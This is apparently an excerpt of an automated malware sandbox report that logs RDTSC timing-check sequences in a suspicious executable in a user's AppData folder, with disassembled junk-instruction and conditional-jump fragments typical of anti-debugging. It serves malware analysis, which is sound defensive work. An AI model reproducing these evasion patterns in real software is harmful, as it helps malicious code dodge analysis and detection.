Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC6446 second address: CC644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC68F7 second address: CC68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC9443 second address: CC9453 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC95C5 second address: CC95D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC95D7 second address: CC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC8h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0E948C9FC4h 0x00000018 pushad 0x00000019 jmp 00007F0E948C9FC8h 0x0000001e je 00007F0E948C9FB6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC9633 second address: CC9638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC9638 second address: CC9653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E948C9FC3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC9653 second address: CC965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCC012 second address: CCC016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFDF4 second address: CCFDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFDF8 second address: CCFDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFDFC second address: CCFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFE02 second address: CCFE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0E948C9FE4h 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 jmp 00007F0E948C9FC5h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFE3C second address: CCFE41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFE41 second address: CCFE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFE49 second address: CCFE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0E94F51A71h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFE85 second address: CCFE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCFE8B second address: CCFE91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCF507 second address: CCF50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CCF50B second address: CCF51B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD4206 second address: CD420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD4361 second address: CD4383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A56h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD44EE second address: CD44F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD44F2 second address: CD4520 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F0E94F51A50h 0x00000010 jnp 00007F0E94F51A62h 0x00000016 ja 00007F0E94F51A52h 0x0000001c jne 00007F0E94F51A46h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD4687 second address: CD468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD468D second address: CD46B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F0E94F51A59h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD47E4 second address: CD4815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC6h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jng 00007F0E948C9FB8h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C81E74 second address: C81E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C81E79 second address: C81ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0E948C9FB6h 0x00000009 jg 00007F0E948C9FB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dx, 9ED0h 0x00000019 mov ebx, dword ptr [ebp+12496053h] 0x0000001f mov edx, 497EB8E2h 0x00000024 mov dword ptr [ebp+12470854h], ecx 0x0000002a add eax, ebx 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F0E948C9FB8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, 1A64E797h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD53D5 second address: CD53E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F0E94F51A46h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD53E2 second address: CD5402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD5402 second address: CD5406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD5406 second address: CD5430 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E948C9FB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0E948C9FC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD9B17 second address: CD9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD9B1C second address: CD9B27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F0E948C9FB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD9C98 second address: CD9C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD9E00 second address: CD9E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD9E04 second address: CD9E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CD9E0A second address: CD9E52 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E948C9FCCh 0x00000008 pushad 0x00000009 jmp 00007F0E948C9FC5h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jne 00007F0E948C9FB6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a jbe 00007F0E948C9FBCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CDFB3B second address: CDFB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CDFB3F second address: CDFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0E948C9FBCh 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CDFB51 second address: CDFB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E94F51A46h 0x00000009 jmp 00007F0E94F51A53h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CDFB6F second address: CDFB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007F0E948C9FBEh 0x0000000e jnc 00007F0E948C9FB8h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE0D51 second address: CE0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE0D55 second address: CE0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE0D5B second address: CE0D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE6B39 second address: CE6B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE6B3F second address: CE6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE6B45 second address: CE6B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE6B4C second address: CE6B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE6B5F second address: CE6B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE6B63 second address: CE6B6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9AAB second address: CE9AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9AB3 second address: CE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E94F51A46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9AC2 second address: CE9AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9D63 second address: CE9D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0E94F51A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9D6F second address: CE9D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9D7A second address: CE9D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9EE1 second address: CE9EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9EE5 second address: CE9EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CE9EE9 second address: CE9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CEA456 second address: CEA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CEA5AF second address: CEA5D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC5h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF2548 second address: CF2558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF2558 second address: CF2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF285C second address: CF2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0E94F51A51h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF2878 second address: CF287E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF287E second address: CF2884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF2884 second address: CF2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF29CE second address: CF29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF2B5E second address: CF2B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E948C9FB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF2CFF second address: CF2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF1B7A second address: CF1B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F0E948C9FBAh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF7748 second address: CF774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF774C second address: CF776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E948C9FBAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F0E948C9FB6h 0x00000014 jl 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF776A second address: CF776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CF776E second address: CF779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F0E948C9FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CFC07C second address: CFC082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D0F031 second address: D0F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3FEA8 second address: C3FEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F0E94F51A46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3FEC4 second address: C3FEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3FEC8 second address: C3FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3FECE second address: C3FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E948C9FC5h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D1AF72 second address: D1AF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D1AF76 second address: D1AF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21CB9 second address: D21CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21CC8 second address: D21CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21CCE second address: D21D0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21D0A second address: D21D14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21D14 second address: D21D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F0E94F51A46h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21D38 second address: D21D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
